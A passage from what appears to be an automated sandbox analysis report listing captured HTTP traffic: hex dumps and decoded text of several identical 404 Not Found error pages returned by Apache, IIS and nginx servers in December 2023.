6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:32 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1635Content-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:30 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1635Content-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:30 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1635Content-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:30 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1635Content-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:30 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1635Content-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:30 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sat, 02 Dec 2023 01:09:32 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sat, 02 Dec 2023 01:09:34 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
